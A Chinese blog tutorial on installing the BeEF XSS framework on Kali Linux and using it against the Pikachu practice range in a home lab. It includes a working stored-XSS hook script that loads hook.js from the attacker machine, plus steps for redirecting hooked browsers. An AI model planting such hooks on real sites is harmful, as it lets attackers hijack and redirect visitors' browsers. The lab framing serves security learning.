XSS另类攻击(四)kali系统beef-xss安装和使用

★★免责声明★★
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将信息做其他用途,由Ta承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

1、环境说明

kali系统,ip:192.168.242.4 ,攻击机

win7系统,ip: 192.168.242.5 ,靶机或部署服务机器

本文是为了下一篇《XSS另类攻击(五)Flash钓鱼配合MSF捆绑上线》准备。

2、kali系统配置准备

2.1、修改更新源目录
# 打开配置文件,按i进入编辑,按esc键退出编辑,输入【:wq!】保存
vim /etc/apt/sources.list

# 建议使用中科大或清华的,阿里最近经常出现问题(日期:2024-05-30)
# 中科大
deb https://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src https://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
# 清华
deb https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main non-free contrib
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main non-free contrib
# 阿里
deb https://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src https://mirrors.aliyun.com/kali kali-rolling main non-free contrib

在这里插入图片描述

2.2、增加数字签名
# 1.下载签名
wget archive.kali.org/archive-key.asc
# 2.安装签名
apt-key add archiv./e-key.asc
# 3.更新一下
apt-get update

修改新的源目录,一定要下载和安装签名,不然无法使用下载。

参考博客:https://blog.csdn.net/weixin_43343679/article/details/133500343

2.3、修改docker镜像源

一般情况一下,镜像源和更新源目录设置一样的。

# 创建或打开daemon.json
vim /etc/docker/daemon.json

# 按I键进入编辑状态,退出按Esc,保存按【:wq!】,退出不保存按【:q!】。

# daemon.json文件加入以下内容,如果已经存在文件,有配置就不需要再添加
{
    "registry-mirrors": ["https://mirrors.ustc.edu.cn"]
}
# 中科大
https://mirrors.ustc.edu.cn
# 清华
https://mirrors.tuna.tsinghua.edu.cn
# 阿里
https://mirrors.aliyun.com

3、安装beef-xss

注意安装时,先切换到root账号

# 切换到root账号
sudo su
# 先升级
apt-get update
# 安装命令
apt-get install beef-xss
3.1、查看或修改密码

如果忘记密码或者想修改密码,可以到是/usr/share/beef-xss/config.yaml 配置文件查看,是明文存储的。修改完需要重启服务才会生效。

# 1、打开配置文件
vim /usr/share/beef-xss/config.yaml
# 2、重启beef-xss服务
systemctl restart beef-xss

在这里插入图片描述

3.2、启动服务

首次启动,会要求修改密码,默认用户名/密码都是:beef,修改密码不可以beef。

# 启动命令
beef-xss

看到关键字:active (running) ,绿色才是启动成功。

在这里插入图片描述

访问后台地址:http://ip:3000/ui/panel

在这里插入图片描述

3.3、常用命令
# 启动beef-xss命令,默认用户名/密码都是:beef,要求修改密码
beef-xss
# 停止beef-xss服务命令
service beef-xss stop 
# 重启beef-xss服务
systemctl restart beef-xss
3.4、异常情况参考

如果启动服务后发现访问不了,可以参考:https://wiki.bafangwy.com/project-4/doc-322/ 。

4、beef-xss使用示例说明

以pikachu靶场的存储型XSS使用作为使用示例说明,

# 勾子脚本,IP地址是部署beef-xss服务的IP
<script src="http://192.168.242.4:3000/hook.js"></script>

把勾子脚本放到pikachu靶场的存储型XSS的留言框提交,

在这里插入图片描述

beef-xss后台刷新就可以看到被攻击的记录。
在这里插入图片描述

比如设置目标地址重定向想要的地址,设置完点按钮Execute,如果用户停留在目标页面或从其他页面再次访问目标页面就会自动重定向,但是如果没有再去点按钮Execute就不会重定向。

操作路径:

Commands
->Browser
->Hooked Domain
–>Redirect Browser

在这里插入图片描述

更多详细用法请使用参考:
https://bbs.huaweicloud.com/blogs/392268
https://blog.csdn.net/qq_53517370/article/details/128992559

5、我的公众号

敬请关注我的公众号:大象只为你,持续更新网安相关知识中…

  • 25
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值